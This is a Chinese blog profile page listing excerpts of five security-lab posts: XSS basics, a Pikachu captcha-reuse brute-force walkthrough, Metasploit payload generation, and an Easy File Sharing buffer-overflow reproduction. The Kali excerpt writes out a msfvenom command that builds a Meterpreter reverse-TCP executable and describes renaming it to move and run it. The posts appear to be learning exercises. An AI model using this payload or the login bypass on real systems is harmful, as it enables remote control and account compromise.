自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(5)
  • 收藏
  • 关注

原创 实验三(1):xss

XSS漏洞,即跨站脚本攻击(Cross-Site Scripting),是一种常见的网络安全漏洞。它允许攻击者在用户的浏览器上执行恶意脚本,这些脚本被嵌入到用户访问的网页中,当用户浏览网站时会被执行。

2024-12-21 14:40:52 331

原创 pikachu暴力破解,验证码绕过(on server)

回bp重放器写正确的验证码,发现响应包里只显示账密错误,这是因为验证码在后台不过期,导致可以长期被使用。账密随便写,验证码输入正确的,登陆前转包一下,发到重放器,方便重发看响应。发现验证码是一定要输入的,再删除请求中的验证码,显示验证码不能为空。回pikachu刷新一下验证码(记得关代理)回去输入正确的账号密码和验证码,发现登录成功。bp爆破账密,得出admin和123456。

2024-12-19 14:05:40 281

原创 跨站脚本攻击XSS (cross site scripting)--一个小实验

跨站脚本攻击(Cross Site Scripting),攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入的Script代码会被执行,从而达到恶意攻击用户的目的。

2024-12-17 19:11:07 379

原创 kali生成被控、主控端

右键文件系统,以root身份打开,找到生成被控端时生成的程序,修改后缀为txt(因为不能拖动exe程序进物理机,但是可以拖动普通文件),再在物理机修改后缀为exe,点击它,虽然打开不了,但是没关系。msfvenom -p windows/meterpreter/reverse_tcp lhost=(ip) lport=(端口) -f exe -o (文件路径)//在Metasploit中使用handlr来做为主控端,它位于exploit下的multi目录中。//主控端需要在Metasploit中启动。

2024-12-14 21:23:02 396

原创 Easy File Sharing Web Server漏洞复现(1)

当程序试图将数据存储到一个固定长度的缓冲区时,而没有正确地检查数据的大小,导致数据超出了缓冲区的边界。这种溢出可能会覆盖相邻的内存区域,包括返回地址、函数指针和其他重要的内存位置,从而可能允许攻击者执行任意代码。通常是因为程序没有对用户输入进行充分的验证。本例中,正常输入123,或输入6000个字符,网页响应不一样。

2024-12-13 15:04:38 823 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除